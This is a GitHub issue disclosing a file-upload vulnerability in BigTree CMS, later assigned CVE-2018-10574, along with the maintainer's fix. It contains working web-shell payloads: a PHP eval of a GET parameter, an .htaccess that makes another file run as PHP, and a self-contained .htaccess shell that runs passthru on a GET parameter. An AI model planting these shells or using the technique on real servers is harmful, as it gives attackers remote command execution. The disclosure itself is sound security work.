Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Getshell via upload function #335

Closed
hazzel-cn opened this issue Apr 25, 2018 · 3 comments
Closed

Getshell via upload function #335

hazzel-cn opened this issue Apr 25, 2018 · 3 comments

Comments

@hazzel-cn
Copy link

Tested on 4.2.22
Platform: Ubuntu + Apache2

prerequisite

In the configuration of Apache, AllowOverride should be All for web directories so that htaccess in sub-directories can take effect. However, it is very easy to satisfy because the URL rewrite function also needs it.

Rationale

Since BigTree needs to ensure the compatibility, it has to use blacklist to filter the extensions of uploaded files. However, while we cannot upload files ended with "ph*", we can upload some files to change the rule of parsing.

Actually, we can upload a .htaccess to the server to make any files in the same directory executed as php files.

Reproduction

1. Preparation

Prepare two files. One is a file named as haozhe or whatever you want. The other one is .htaccess
In haozhe:

<script language="php">eval($_GET['cmd']); phpinfo();</script>

In .htaccess:

<FilesMatch "haozhe."> # here is a dot in the filename.
SetHandler application/x-httpd-php
</FilesMatch>

Upload Two files

In the page of http://xx/bt3/site/index.php/admin/trees/add/ , click Browse button to upload a file. Upload these two files.

It works!

image

@hazzel-cn
Copy link
Author

Well, one .htaccess is enough.

# Self contained .htaccess web shell - Part of the htshell project
# Written by Wireghoul - http://www.justanotherhacker.com

# Override default deny rule to make .htaccess file accessible over web
<Files ~ "^\.ht">
Order allow,deny
Allow from all
</Files>

# Make .htaccess file be interpreted as php file. This occur after apache has interpreted
# the apache directoves from the .htaccess file
AddType application/x-httpd-php .htaccess

###### SHELL ###### <?php echo "\n";passthru($_GET['c']." 2>&1"); ?>###### LLEHS ######

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20insecure%20files/PHP%20.htaccess/.htaccess

timbuckingham added a commit that referenced this issue Apr 30, 2018
@timbuckingham
Copy link
Collaborator

Thank you! I've updated the Storage class regex to reject htaccess files.

@fgeek
Copy link

fgeek commented Dec 25, 2018

CVE-2018-10574 has been assigned for this vulnerability.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

3 participants